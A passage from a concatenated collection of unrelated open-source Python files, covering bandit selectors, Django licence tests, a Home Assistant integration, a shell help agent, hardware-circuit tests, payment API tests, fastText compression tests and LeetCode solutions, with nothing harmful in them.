for y in range(ystart, yend+1):
download_url(zoom, x, y, cur)
conn.commit()
cur.close()
conn.close()
main(argv)
|
btb/selection/recent.py | dataronio/BTB | 161 | 12798133 | <filename>btb/selection/recent.py
import logging
from btb.selection.ucb1 import UCB1
# the minimum number of scores that each choice must have in order to use
# best-K optimizations. If not all choices meet this threshold, default UCB1
# selection will be used.
K_MIN = 2
logger = logging.getLogger('btb')
class RecentKReward(UCB1):
"""Recent K reward selector
Args:
k (int): number of best scores to consider
"""
def __init__(self, choices, k=K_MIN):
super(RecentKReward, self).__init__(choices)
self.k = k
def compute_rewards(self, scores):
"""Retain the K most recent scores, and replace the rest with zeros"""
for i in range(len(scores)):
if i >= self.k:
scores[i] = 0.
return scores
def select(self, choice_scores):
"""Use the top k learner's scores for usage in rewards for the bandit calculation"""
# if we don't have enough scores to do K-selection, fall back to UCB1
min_num_scores = min([len(s) for s in choice_scores.values()])
if min_num_scores >= K_MIN:
logger.info('{klass}: using Best K bandit selection'.format(klass=type(self).__name__))
reward_func = self.compute_rewards
else:
logger.warning(
'{klass}: Not enough choices to do K-selection; using plain UCB1'
.format(klass=type(self).__name__))
reward_func = super(RecentKReward, self).compute_rewards
choice_rewards = {}
for choice, scores in choice_scores.items():
if choice not in self.choices:
continue
choice_rewards[choice] = reward_func(scores)
return self.bandit(choice_rewards)
class RecentKVelocity(RecentKReward):
"""Recent K velocity selector"""
def compute_rewards(self, scores):
"""Compute the velocity of thte k+1 most recent scores.
The velocity is the average distance between scores. Return a list with those k velocities
padded out with zeros so that the count remains the same.
"""
# take the k + 1 most recent scores so we can get k velocities
recent_scores = scores[:-self.k - 2:-1]
velocities = [recent_scores[i] - recent_scores[i + 1] for i in
range(len(recent_scores) - 1)]
# pad the list out with zeros, so the length of the list is
# maintained
zeros = (len(scores) - self.k) * [0]
return velocities + zeros
|
src/ralph/licences/tests/tests_models.py | DoNnMyTh/ralph | 1,668 | 12798145 | <filename>src/ralph/licences/tests/tests_models.py
# -*- coding: utf-8 -*-
from django.core.exceptions import ValidationError
from django.core.urlresolvers import reverse
from ralph.accounts.tests.factories import RegionFactory, UserFactory
from ralph.back_office.tests.factories import BackOfficeAssetFactory
from ralph.lib.transitions.tests import TransitionTestCase
from ralph.licences.models import BaseObjectLicence, Licence, LicenceUser
from ralph.licences.tests.factories import LicenceFactory
from ralph.tests import RalphTestCase
from ralph.tests.mixins import ClientMixin
class BaseObjectLicenceCleanTest(RalphTestCase):
def setUp(self):
super().setUp()
self.region_pl = RegionFactory(name='pl')
self.region_de = RegionFactory(name='de')
self.licence_de = LicenceFactory(region=self.region_de)
self.bo_asset = BackOfficeAssetFactory(region=self.region_pl)
def test_region_validate(self):
base_object_licence = BaseObjectLicence()
base_object_licence.licence = self.licence_de
base_object_licence.base_object = self.bo_asset
with self.assertRaisesRegex(
ValidationError,
(
'Asset region is in a different region than licence.'
)
):
base_object_licence.clean()
class LicenceTest(RalphTestCase):
def setUp(self):
super().setUp()
self.licence_1 = LicenceFactory(number_bought=3)
self.licence_2 = LicenceFactory(number_bought=1)
self.user_1 = UserFactory()
self.bo_asset = BackOfficeAssetFactory()
def test_get_autocomplete_queryset(self):
with self.assertNumQueries(2):
self.assertCountEqual(
Licence.get_autocomplete_queryset().values_list(
'pk', flat=True
),
[self.licence_1.pk, self.licence_2.pk]
)
def test_get_autocomplete_queryset_all_used(self):
BaseObjectLicence.objects.create(
base_object=self.bo_asset, licence=self.licence_1, quantity=1,
)
LicenceUser.objects.create(
user=self.user_1, licence=self.licence_1, quantity=2
)
with self.assertNumQueries(2):
self.assertCountEqual(
Licence.get_autocomplete_queryset().values_list(
'pk', flat=True
),
[self.licence_2.pk]
)
class LicenceFormTest(TransitionTestCase, ClientMixin):
def test_service_env_not_required(self):
self.assertTrue(self.login_as_user())
licence = LicenceFactory()
url = reverse(
'admin:licences_licence_change',
args=(licence.pk,)
)
resp = self.client.get(url, follow=True)
self.assertEqual(resp.status_code, 200)
form = resp.context['adminform'].form
self.assertIn('service_env', form.fields)
self.assertFalse(
form.fields['service_env'].required
)
def test_depreciation_rate_not_required(self):
self.assertTrue(self.login_as_user())
licence = LicenceFactory()
url = reverse(
'admin:licences_licence_change',
args=(licence.pk,)
)
resp = self.client.get(url, follow=True)
self.assertEqual(resp.status_code, 200)
form = resp.context['adminform'].form
self.assertIn('depreciation_rate', form.fields)
self.assertFalse(
form.fields['depreciation_rate'].required
)
|
homeassistant/components/laundrify/__init__.py | liangleslie/core | 30,023 | 12798181 | """The laundrify integration."""
from __future__ import annotations
from laundrify_aio import LaundrifyAPI
from laundrify_aio.exceptions import ApiConnectionException, UnauthorizedException
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_ACCESS_TOKEN, Platform
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import ConfigEntryAuthFailed, ConfigEntryNotReady
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from .const import DEFAULT_POLL_INTERVAL, DOMAIN
from .coordinator import LaundrifyUpdateCoordinator
PLATFORMS = [Platform.BINARY_SENSOR]
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Set up laundrify from a config entry."""
session = async_get_clientsession(hass)
api_client = LaundrifyAPI(entry.data[CONF_ACCESS_TOKEN], session)
try:
await api_client.validate_token()
except UnauthorizedException as err:
raise ConfigEntryAuthFailed("Invalid authentication") from err
except ApiConnectionException as err:
raise ConfigEntryNotReady("Cannot reach laundrify API") from err
coordinator = LaundrifyUpdateCoordinator(hass, api_client, DEFAULT_POLL_INTERVAL)
await coordinator.async_config_entry_first_refresh()
hass.data.setdefault(DOMAIN, {})[entry.entry_id] = {
"api": api_client,
"coordinator": coordinator,
}
hass.config_entries.async_setup_platforms(entry, PLATFORMS)
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload a config entry."""
if unload_ok := await hass.config_entries.async_unload_platforms(entry, PLATFORMS):
hass.data[DOMAIN].pop(entry.entry_id)
return unload_ok
|
clai/server/plugins/helpme/helpme.py | cohmoti/clai | 391 | 12798217 | #
# Copyright (C) 2020 IBM. All Rights Reserved.
#
# See LICENSE.txt file in the root directory
# of this source tree for licensing information.
#
import os
from pathlib import Path
from clai.tools.colorize_console import Colorize
from clai.server.searchlib.data import Datastore
from clai.server.agent import Agent
from clai.server.command_message import State, Action, NOOP_COMMAND
from clai.server.logger import current_logger as logger
class HelpMeAgent(Agent):
def __init__(self):
super(HelpMeAgent, self).__init__()
inifile_path = os.path.join(str(Path(__file__).parent.absolute()), 'config.ini')
self.store = Datastore(inifile_path)
def compute_simple_token_similarity(self, src_sequence, tgt_sequence):
src_tokens = set([x.lower().strip() for x in src_sequence.split()])
tgt_tokens = set([x.lower().strip() for x in tgt_sequence.split()])
return len(src_tokens & tgt_tokens) / len(src_tokens)
def compute_confidence(self, query, forum, manpage):
"""
Computes the confidence based on query, stack-exchange post answer and manpage
Algorithm:
1. Compute token-wise similarity b/w query and forum text
2. Compute token-wise similarity b/w forum text and manpage description
3. Return product of two similarities
Args:
query (str): standard error captured in state variable
forum (str): answer text from most relevant stack exchange post w.r.t query
manpage (str): manpage description for most relevant manpage w.r.t. forum
Returns:
confidence (float): confidence on the returned manpage w.r.t. query
"""
query_forum_similarity = self.compute_simple_token_similarity(query, forum[0]['Content'])
forum_manpage_similarity = self.compute_simple_token_similarity(forum[0]['Answer'], manpage)
confidence = query_forum_similarity * forum_manpage_similarity
return confidence
def get_next_action(self, state: State) -> Action:
return Action(suggested_command=state.command)
def post_execute(self, state: State) -> Action:
logger.info("==================== In Helpme Bot:post_execute ============================")
logger.info("State:\n\tCommand: {}\n\tError Code: {}\n\tStderr: {}".format(state.command,
state.result_code,
state.stderr))
logger.info("============================================================================")
if state.result_code == '0':
return Action(suggested_command=state.command)
apis:OrderedDict=self.store.get_apis()
helpWasFound = False
for provider in apis:
# We don't want to process the manpages provider... thats the provider
# that we use to clarify results from other providers
if provider == "manpages":
logger.info(f"Skipping search provider 'manpages'")
continue
thisAPI:Provider = apis[provider]
# Skip this provider if it isn't supported on the target OS
if not thisAPI.can_run_on_this_os():
logger.info(f"Skipping search provider '{provider}'")
logger.info(f"==> Excluded on platforms: {str(thisAPI.get_excludes())}")
continue # Move to next provider in list
logger.info(f"Processing search provider '{provider}'")
if thisAPI.has_variants():
logger.info(f"==> Has search variants: {str(thisAPI.get_variants())}")
variants:List = thisAPI.get_variants()
else:
logger.info(f"==> Has no search variants")
variants:List = [None]
# For each search variant supported by the current API, query
# the data store to find the closest matching data. If there are
# no search variants (ie: the singleton variant case), the variants
# list will only contain a single, Nonetype value.
for variant in variants:
if variant is not None:
logger.info(f"==> Searching variant '{variant}'")
data = self.store.search(state.stderr, service=provider, size=1, searchType=variant)
else:
data = self.store.search(state.stderr, service=provider, size=1)
if data:
apiString = str(thisAPI)
if variant is not None:
apiString = f"{apiString} '{variant}' variant"
logger.info(f"==> Success!!! Found a result in the {apiString}")
# Find closest match b/w relevant data and manpages for unix
searchResult = thisAPI.extract_search_result(data)
manpages = self.store.search(searchResult, service='manpages', size=5)
if manpages:
logger.info("==> Success!!! found relevant manpages.")
command = manpages['commands'][-1]
confidence = manpages['dists'][-1]
# FIXME: Artificially boosted confidence
confidence = 1.0
logger.info("==> Command: {} \t Confidence:{}".format(command, confidence))
# Set return data
suggested_command="man {}".format(command)
description=Colorize() \
.emoji(Colorize.EMOJI_ROBOT).append(f"I did little bit of Internet searching for you, ") \
.append(f"and found this in the {thisAPI}:\n") \
.info() \
.append(thisAPI.get_printable_output(data)) \
.warning() \
.append("Do you want to try: man {}".format(command)) \
.to_console()
# Mark that help was indeed found
helpWasFound = True
# We've found help; no need to keep searching
break
# If we found help, then break out of the outer loop as well
if helpWasFound:
break
if not helpWasFound:
logger.info("Failure: Unable to be helpful")
logger.info("============================================================================")
suggested_command=NOOP_COMMAND
description=Colorize().emoji(Colorize.EMOJI_ROBOT) \
.append(
f"Sorry. It looks like you have stumbled across a problem that even the Internet doesn't have answer to.\n") \
.info() \
.append(f"Have you tried turning it OFF and ON again. ;)") \
.to_console()
confidence=0.0
return Action(suggested_command=suggested_command,
description=description,
confidence=confidence)
|
tests/test_circuit/test_undriven_unused.py | leonardt/magma | 167 | 12798233 | """
Test the ability to ignore undriven inputs (useful for formal verification
tools that use undriven inputs to mark wires that can take on any value)
"""
import pytest
import magma as m
from magma.testing import check_files_equal
def test_ignore_unused_undriven_basic():
class Main(m.Circuit):
_ignore_undriven_ = True
io = m.IO(I=m.In(m.Bit), O=m.Out(m.Bit))
temp = ~io.I
m.compile("build/test_ignore_unused_undriven_basic", Main, inline=True,
drive_undriven=True, terminate_unused=True)
assert check_files_equal(__file__,
"build/test_ignore_unused_undriven_basic.v",
"gold/test_ignore_unused_undriven_basic.v")
def test_ignore_unused_undriven_hierarchy():
# For backwards compatability test
with pytest.warns(DeprecationWarning):
Bar = m.DeclareCircuit("Bar", "I", m.In(m.Bit))
class Foo(m.Circuit):
io = m.IO(I0=m.In(m.Bit), I1=m.In(m.Bit),
O0=m.Out(m.Bit), O1=m.Out(m.Bit))
io.O1 @= io.I0
Bar()(io.I1)
class Main(m.Circuit):
_ignore_undriven_ = True
io = m.IO(I0=m.In(m.Bit), I1=m.In(m.Bit),
O0=m.Out(m.Bit), O1=m.Out(m.Bit),
O2=m.Out(m.Tuple[m.Bit, m.Bit]),
O3=m.Out(m.Array[2, m.Bit]))
foo = Foo()
foo.I0 @= io.I0
io.O0 @= foo.O0
# partially undriven
io.O2[0] @= 1
io.O3[0] @= 1
m.compile("build/test_ignore_unused_undriven_hierarchy", Main, inline=True,
drive_undriven=True, terminate_unused=True)
assert check_files_equal(__file__,
"build/test_ignore_unused_undriven_hierarchy.v",
"gold/test_ignore_unused_undriven_hierarchy.v")
def test_ignore_undriven_coreir():
class Foo(m.Circuit):
_ignore_undriven_ = True
io = m.IO(I0=m.In(m.Bit), O0=m.Out(m.Bit), O1=m.Out(m.Bit))
io += m.ClockIO()
io.O1 @= io.I0
class Main(m.Circuit):
_ignore_undriven_ = True
io = m.IO(I0=m.In(m.Bits[2]), I1=m.In(m.Bits[2]), O0=m.Out(m.Bit),
O1=m.Out(m.Bit)) + m.ClockIO()
foo = Foo()
foo.I0 @= io.I0 == io.I1
io.O0 @= foo.O0
m.compile("build/test_ignore_undriven_coreir", Main, output="coreir",
drive_undriven=True, terminate_unused=True)
assert check_files_equal(__file__,
"build/test_ignore_undriven_coreir.json",
"gold/test_ignore_undriven_coreir.json")
|
payment/tests/integ/test_api.py | Al-bambino/aws-serverless-ecommerce-platform | 758 | 12798249 | <filename>payment/tests/integ/test_api.py
import uuid
import pytest
import requests
from fixtures import iam_auth # pylint: disable=import-error
from helpers import get_parameter # pylint: disable=import-error,no-name-in-module
@pytest.fixture(scope="module")
def payment_3p_api_url():
return get_parameter("/ecommerce/{Environment}/payment-3p/api/url")
@pytest.fixture(scope="module")
def payment_api_url():
return get_parameter("/ecommerce/{Environment}/payment/api/url")
def test_backend_validate(payment_3p_api_url, payment_api_url, iam_auth):
"""
Test /backend/validate
"""
card_number = "1234567890123456"
total = 3000
# Create a payment token
res_3p = requests.post(payment_3p_api_url+"/preauth", json={
"cardNumber": card_number,
"amount": total
})
payment_token = res_3p.json()["paymentToken"]
# Validate the token
res = requests.post(
payment_api_url+"/backend/validate",
auth=iam_auth(payment_api_url),
json={
"paymentToken": payment_token,
"total": total
}
)
assert res.status_code == 200
body = res.json()
assert "ok" in body
assert "message" not in body
assert body["ok"] == True
# Cleanup
requests.post(payment_3p_api_url+"/cancelPayment", json={
"paymentToken": payment_token
})
def test_backend_validate_non_existent(payment_3p_api_url, payment_api_url, iam_auth):
"""
Test /backend/validate with a non-existent token
"""
payment_token = str(<KEY>())
total = 3000
# Validate the token
res = requests.post(
payment_api_url+"/backend/validate",
auth=iam_auth(payment_api_url),
json={
"paymentToken": payment_token,
"total": total
}
)
assert res.status_code == 200
body = res.json()
assert "ok" in body
assert "message" not in body
assert body["ok"] == False
def test_backend_validate_smaller_total(payment_3p_api_url, payment_api_url, iam_auth):
"""
Test /backend/validate with a smaller total
"""
card_number = "1234567890123456"
total = 3000
# Create a payment token
res_3p = requests.post(payment_3p_api_url+"/preauth", json={
"cardNumber": card_number,
"amount": total
})
payment_token = res_3p.json()["paymentToken"]
# Validate the token
res = requests.post(
payment_api_url+"/backend/validate",
auth=iam_auth(payment_api_url),
json={
"paymentToken": payment_token,
"total": total-1000
}
)
assert res.status_code == 200
body = res.json()
assert "ok" in body
assert "message" not in body
assert body["ok"] == True
# Cleanup
requests.post(payment_3p_api_url+"/cancelPayment", json={
"paymentToken": payment_token
})
def test_backend_validate_higher_total(payment_3p_api_url, payment_api_url, iam_auth):
"""
Test /backend/validate with a higher total
"""
card_number = "1234567890123456"
total = 3000
# Create a payment token
res_3p = requests.post(payment_3p_api_url+"/preauth", json={
"cardNumber": card_number,
"amount": total
})
payment_token = res_3p.json()["paymentToken"]
# Validate the token
res = requests.post(
payment_api_url+"/backend/validate",
auth=iam_auth(payment_api_url),
json={
"paymentToken": payment_token,
"total": total+2000
}
)
assert res.status_code == 200
body = res.json()
assert "ok" in body
assert "message" not in body
assert body["ok"] == False
# Cleanup
requests.post(payment_3p_api_url+"/cancelPayment", json={
"paymentToken": payment_token
})
def test_backend_validate_no_iam(payment_3p_api_url, payment_api_url):
"""
Test /backend/validate without IAM authorization
"""
card_number = "1234567890123456"
total = 3000
# Create a payment token
res_3p = requests.post(payment_3p_api_url+"/preauth", json={
"cardNumber": card_number,
"amount": total
})
payment_token = res_3p.json()["paymentToken"]
# Validate the token
res = requests.post(
payment_api_url+"/backend/validate",
json={
"paymentToken": payment_token,
"total": total
}
)
assert res.status_code == 403
body = res.json()
assert "ok" not in body
assert "message" in body
# Cleanup
requests.post(payment_3p_api_url+"/cancelPayment", json={
"paymentToken": payment_token
})
def test_backend_validate_no_total(payment_3p_api_url, payment_api_url, iam_auth):
"""
Test /backend/validate without an total
"""
card_number = "1234567890123456"
total = 3000
# Create a payment token
res_3p = requests.post(payment_3p_api_url+"/preauth", json={
"cardNumber": card_number,
"amount": total
})
payment_token = res_3p.json()["paymentToken"]
# Validate the token
res = requests.post(
payment_api_url+"/backend/validate",
auth=iam_auth(payment_api_url),
json={
"paymentToken": payment_token
}
)
assert res.status_code == 400
body = res.json()
assert "ok" not in body
assert "message" in body
assert "total" in body["message"]
# Cleanup
requests.post(payment_3p_api_url+"/cancelPayment", json={
"paymentToken": payment_token
})
def test_backend_validate_no_payment_token(payment_3p_api_url, payment_api_url, iam_auth):
"""
Test /backend/validate without a payment token
"""
card_number = "1234567890123456"
total = 3000
# Create a payment token
res_3p = requests.post(payment_3p_api_url+"/preauth", json={
"cardNumber": card_number,
"amount": total
})
payment_token = res_3p.json()["paymentToken"]
# Validate the token
res = requests.post(
payment_api_url+"/backend/validate",
auth=iam_auth(payment_api_url),
json={
"total": total
}
)
assert res.status_code == 400
body = res.json()
assert "ok" not in body
assert "message" in body
assert "paymentToken" in body["message"]
# Cleanup cancelPayment
requests.post(payment_3p_api_url+"/cancelPayment", json={
"paymentToken": payment_token
}) |
thanks/package_tools.py | vsprogrammer2909/thanks | 168 | 12798259 | <filename>thanks/package_tools.py
from functools import reduce
from itertools import chain, takewhile
import os
import pkg_resources
import re
class MetaDataNotFound(Exception):
pass
def get_local_dist(package_name):
working_set = dict(
(dist.project_name, dist) for dist in pkg_resources.WorkingSet()
)
return working_set[package_name]
def get_dist_metadata(dist):
metadata_path = get_local_dist_metadata_filepath(dist)
with open(metadata_path) as fh:
metadata = parse_metadata(fh.read())
return metadata
def get_funding_data(metadata):
return metadata.get('funding_url')
def get_local_dist_metadata_filepath(dist):
# Dist filename syntax
# name ["-" version ["-py" pyver ["-" required_platform]]] "." ext
# https://setuptools.readthedocs.io/en/latest/formats.html#filename-embedded-metadata
def valid_component(component):
return component[1]
# Stop taking filename components at the first missing/invalid component
filename_component = takewhile(valid_component, (
('', pkg_resources.to_filename(pkg_resources.safe_name(dist.project_name))),
('-', pkg_resources.to_filename(pkg_resources.safe_version(dist.version))),
('-py', dist.py_version),
('-', dist.platform),
))
filename = ''.join(chain(*filename_component))
if isinstance(dist, pkg_resources.EggInfoDistribution):
ext = 'egg-info'
metadata_file = 'PKG-INFO'
elif isinstance(dist, pkg_resources.DistInfoDistribution):
ext = 'dist-info'
metadata_file = 'METADATA'
elif isinstance(dist, pkg_resources.Distribution):
ext = os.path.join('egg', 'EGG-INFO')
metadata_file = 'PKG-INFO'
else:
ext = None
metadata_file = None
filename = '{}.{}'.format(filename, ext)
path = os.path.join(dist.location, filename, metadata_file)
if ext:
return path
else:
return None
metadata_patterns = re.compile(r"""
(\s*Author:\s+(?P<author>.*)\s*)? # Author
(\s*Maintainer:\s+(?P<maintainer>.+)\s*)? # Maintainer
(\s*Project-URL:\sFunding,\s+(?P<funding_url>.+)\s*)? # Funding URL
""", re.VERBOSE)
def get_line_metadata(line):
return metadata_patterns.search(line).groupdict()
def filter_empty_metadata(metadata):
return dict((k, v) for k, v in metadata.items() if v)
def parse_metadata(metadata):
metadata = (
filter_empty_metadata(get_line_metadata(line))
for line in metadata.splitlines()
)
metadata = [m for m in metadata if m]
metadata = reduce(
lambda x, y: dict((k, v) for k, v in chain(x.items(), y.items())),
metadata,
{},
)
return metadata
def get_local_metadata(package_name):
try:
dist = get_local_dist(package_name)
metadata = get_dist_metadata(dist)
except FileNotFoundError:
# No metadata.json file locally
raise MetaDataNotFound()
return metadata
def get_local_funding_metadata(package_name):
try:
metadata = get_local_metadata(package_name)
funding_url = get_funding_data(metadata)
except KeyError:
# Package not available locally,
# or there isn't a 'Funding' entry in the project_urls
raise MetaDataNotFound()
return funding_url
|
backend/lk/logic/websites.py | Purus/LaunchKitDocker | 2,341 | 12798281 | <gh_stars>1000+
# encoding: utf-8
#
# Copyright 2016 Cluster Labs, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
from datetime import datetime
from django.conf import settings
from django.db import transaction
from backend.lk.logic import appstore_fetch
from backend.lk.models import AppWebsiteScreenshot
from backend.lk.models import AppWebsitePage
from backend.util import dnsutil
from backend.util import text
def check_domain_for_cname_record(domain):
cname, error_message = dnsutil.get_cname_for_domain(domain)
if error_message:
return False, error_message
if cname != '%s.' % settings.HOSTED_WEBSITE_CNAME:
return False, 'The CNAME value is set but incorrect'
return True, None
def _short_description(long_description):
if not long_description:
return long_description
return '%s...' % long_description[:180]
def example_from_itunes_id(itunes_id, country):
info = appstore_fetch.app_info_with_id(itunes_id, country)
app_name, app_tagline = text.app_name_tagline(info.name)
example_website = {
'id': 'example',
'appName': app_name,
'tagline': app_tagline,
'longDescription': info.description,
'shortDescription': _short_description(info.description),
'itunesId': info.itunes_id,
'images': {
'screenshots': {'iPhone': [{'url': screenshot} for screenshot in info.screenshots]},
'icon': {'url': info.icon_512},
}
}
return example_website
def get_fancy_cluster_example():
return {
'id': 'example',
'domain': 'cluster.co',
'template': '',
'appName': 'Cluster',
'tagline': 'Privately share special moments with friends and family',
'shortDescription': 'Cluster gives you a private space to share photos and memories with the people you choose, away from social media. Make your own groups and share pics, videos, comments, and chat!',
'longDescription': u'Cluster makes it possible to create private groups where you share moments through photos and videos with the people you care about. Create a group with family, a group of friends, coworkers, people from your home town, or anyone else!\r\n\r\nGreat for:\r\n\u2022 New Moms! Share photos of a new baby with close friends and family without spamming everyone on other social networks\r\n\u2022 College Students! Share memories with friends not appropriate for Facebook\r\n\u2022 Families! Keep in touch even if you\u2019re not in the same place.\r\n\r\nTons of people already trust Cluster. Here\u2019s why:\r\n\r\n\u2022 Private & secure: Only invited members of the group can see what you post.\r\n\u2022 An app for everyone: Access Cluster through gorgeous mobile apps and the web.\r\n\u2022 Relevant notifications: Know when people you invited post new things to the group.',
'keywords': 'private,group,social,network,space,family,album,photo,video,collaborative,shared,sharing,event,baby',
'itunesId': '596595032',
'playStoreId': 'com.getcluster.android',
'supportLink': 'http://cluster.co/help',
'termsLink': 'http://cluster.co/terms',
'privacyLink': 'http://cluster.co/privacy',
'primaryColor': '#0092F2',
'font': 'Lato',
'frameScreenshots': 'white',
'images': {
'logo': {'url':'https://cluster-static.s3.amazonaws.com/images/marketing/presskit/cluster-logo-white-v1f813d97.png'},
'background': {'url':'https://cluster-static.s3.amazonaws.com/images/namespaces/default/homepage-billboard-v4bead2de.jpg'},
'icon': {'url':'http://a1668.phobos.apple.com/us/r30/Purple3/v4/01/c6/f0/01c6f095-df15-7bd9-03f6-53dba727cc8b/mzl.clrnjwyb.png'},
'screenshots':
{'iPhone': [{'url':'http://a3.mzstatic.com/us/r30/Purple3/v4/46/6a/f0/466af0fb-f1d7-80b5-6d03-ccd36ad904ef/screen1136x1136.jpeg'},
{'url':'http://a2.mzstatic.com/us/r30/Purple3/v4/4d/41/8c/4d418cfe-a384-312b-f04f-ac336c3359ff/screen1136x1136.jpeg'},
{'url':'http://a5.mzstatic.com/us/r30/Purple5/v4/21/a6/5a/21a65abd-2f66-6265-1fb0-c08c72e403b3/screen1136x1136.jpeg'},
{'url':'http://a3.mzstatic.com/us/r30/Purple3/v4/a6/6d/4e/a66d4e25-d0f7-d1d0-05ab-edffa3899c14/screen1136x1136.jpeg'},
{'url':'http://a4.mzstatic.com/us/r30/Purple1/v4/33/a0/d0/33a0d056-1761-9c51-4bb7-35813eb14f1f/screen1136x1136.jpeg'},
],
}
},
}
@transaction.atomic
def update_website_screenshots(website, screenshot_images, platform):
existing_screenshots = list(AppWebsiteScreenshot.objects.filter(website_id=website.id, platform=platform).order_by('order'))
screenshot_image_ids = set([i.id for i in screenshot_images])
screenshots_to_delete = [s for s in existing_screenshots
if s.image_id not in screenshot_image_ids]
for screenshot in screenshots_to_delete:
screenshot.image.decrement_ref_count()
screenshot.delete()
existing_by_image_id = {i.image_id: i for i in existing_screenshots}
for i, image in enumerate(screenshot_images):
order = i + 1
if image.id in existing_by_image_id:
screenshot = existing_by_image_id[image.id]
if screenshot.order != order:
screenshot.order = order
screenshot.save()
else:
image.increment_ref_count()
screenshot = AppWebsiteScreenshot(website=website, image=image, platform=platform, order=order)
screenshot.save()
@transaction.atomic
def create_or_update_hosted_page(website, slug, body):
hosted_page_titles = {
'terms' : 'Terms and Conditions',
'privacy' : 'Privacy Policy',
'support' : 'Support',
}
page = AppWebsitePage.objects.filter(website=website, slug=slug).first()
if page and body:
page.body = body
page.save()
elif not page and body:
AppWebsitePage.objects.create(website=website, slug=slug, body=body, title=hosted_page_titles[slug])
elif page and not body:
page.delete()
@transaction.atomic
def delete_website(website):
screenshots = list(website.screenshots.all())
for screenshot in screenshots:
screenshot.image.decrement_ref_count()
screenshot.delete()
if website.icon:
website.icon.decrement_ref_count()
website.icon = None
if website.logo:
website.logo.decrement_ref_count()
website.logo = None
if website.background:
website.background.decrement_ref_count()
website.background = None
# TODO(Taylor): Mark as deleted instead of actually deleting potentially huge number of rows
# AppWebsiteView.objects.filter(website_id=website.id).delete()
website.domain = None
website.delete_time = datetime.now()
website.save()
|
Python3/1287.py | rakhi2001/ecom7 | 854 | 12798313 | <reponame>rakhi2001/ecom7
__________________________________________________________________________________________________
sample 76 ms submission
class Solution:
def findSpecialInteger(self, arr: List[int]) -> int:
for idx, num in enumerate(arr):
if arr[idx] == arr[idx+len(arr)//4]: return num
__________________________________________________________________________________________________
sample 80 ms submission
class Solution:
def findSpecialInteger(self, arr: List[int]) -> int:
size = int((len(arr)) / 4)
loose = max(1, size)
for index in range(0, len(arr), loose):
candidate = arr[index]
left = bisect.bisect_left(arr, candidate, max(0, index - loose), min(len(arr), index + loose))
right = bisect.bisect_right(arr, candidate, max(0, index - loose), min(len(arr), index + loose))
if right - left > size:
return arr[index]
assert(False)
__________________________________________________________________________________________________
|
tests/test_all.py | avidale/compress-fasttext | 111 | 12798336 | import os
import gensim
import pytest
import compress_fasttext
from sklearn.pipeline import make_pipeline
from sklearn.linear_model import LogisticRegression
from compress_fasttext.feature_extraction import FastTextTransformer
BIG_MODEL_FILE = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'data/test_data/ft_leipzig_ru_mini.bin')
BASE_MODEL_URL = 'https://github.com/avidale/compress-fasttext/releases/download/'
def cosine_sim(x, y):
return sum(x * y) / (sum(x**2) * sum(y**2)) ** 0.5
@pytest.mark.parametrize('method, params', [
(compress_fasttext.quantize_ft, dict(qdim=32)),
(compress_fasttext.prune_ft_freq, dict(pq=False, new_ngrams_size=10_000, new_vocab_size=10_000)),
(compress_fasttext.prune_ft_freq, dict(pq=True, new_ngrams_size=10_000, new_vocab_size=10_000, qdim=16)),
(compress_fasttext.prune_ft, dict(new_ngrams_size=10_000, new_vocab_size=10_000)),
(compress_fasttext.svd_ft, dict(n_components=32)),
])
def test_prune_save_load(method, params):
word1 = 'синий'
word2 = 'белый'
big_ft = gensim.models.fasttext.FastTextKeyedVectors.load(BIG_MODEL_FILE)
vec0 = big_ft[word1]
small_model = method(big_ft, **params)
assert cosine_sim(vec0, small_model[word1]) > 0.75
out1 = small_model.most_similar(word1)
assert word2 in {w for w, sim in out1}
small_model.save('tmp_small.bin')
small_model2 = compress_fasttext.models.CompressedFastTextKeyedVectors.load('tmp_small.bin')
assert cosine_sim(vec0, small_model2[word1]) > 0.75
out2 = small_model2.most_similar(word1)
assert word2 in {w for w, sim in out2}
assert out1[0][1] == pytest.approx(out2[0][1])
@pytest.mark.parametrize('word1, word2, model_name', [
('белый', 'черный', 'gensim-4-draft/geowac_tokens_sg_300_5_2020-100K-20K-100.bin'),
('white', 'black', 'gensim-4-draft/ft_cc.en.300_freqprune_50K_5K_pq_100.bin'),
('white', 'black', 'v0.0.4/cc.en.300.compressed.bin'),
])
def test_loading_existing_models(word1, word2, model_name):
ft = compress_fasttext.models.CompressedFastTextKeyedVectors.load(BASE_MODEL_URL + model_name)
out = ft.most_similar(word1)
assert word2 in {w for w, sim in out}
def test_sklearn_wrapper():
small_model = compress_fasttext.models.CompressedFastTextKeyedVectors.load(
'https://github.com/avidale/compress-fasttext/releases/download/v0.0.4/cc.en.300.compressed.bin'
)
classifier = make_pipeline(
FastTextTransformer(model=small_model),
LogisticRegression()
).fit(
['banana', 'soup', 'burger', 'car', 'tree', 'city'],
[1, 1, 1, 0, 0, 0]
)
assert (classifier.predict(['jet', 'train', 'cake', 'apple']) == [0, 0, 1, 1]).all()
|
tools/authors.py | roboterclubaachen/xpcc | 161 | 12798367 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2017, <NAME>
# All rights reserved.
#
# The file is part of the xpcc library and is released under the 3-clause BSD
# license. See the file `LICENSE` for the full license governing this code.
# -----------------------------------------------------------------------------
import subprocess, locale
from collections import defaultdict
import argparse
author_handles = {
"<NAME>": "AndreGilerson",
"<NAME>": "Sh4rK",
"<NAME>": None,
"<NAME>": "cajt",
"<NAME>": "chrism333",
"<NAME>": None,
"<NAME>": "chris-durand",
"<NAME>": "daniel-k",
"<NAME>": "dhebbeker",
"<NAME>": "dergraaf",
"<NAME>": "georgi-g",
"<NAME>": "RzwoDzwo",
"<NAME>": None,
"<NAME>": "ekiwi",
"<NAME>": "lmoesch",
"<NAME>": "Maju-Ketchup",
"<NAME>": "Scabber",
"<NAME>": "thundernail",
"<NAME>": "mhthies",
"<NAME>": "genbattle",
"<NAME>": None,
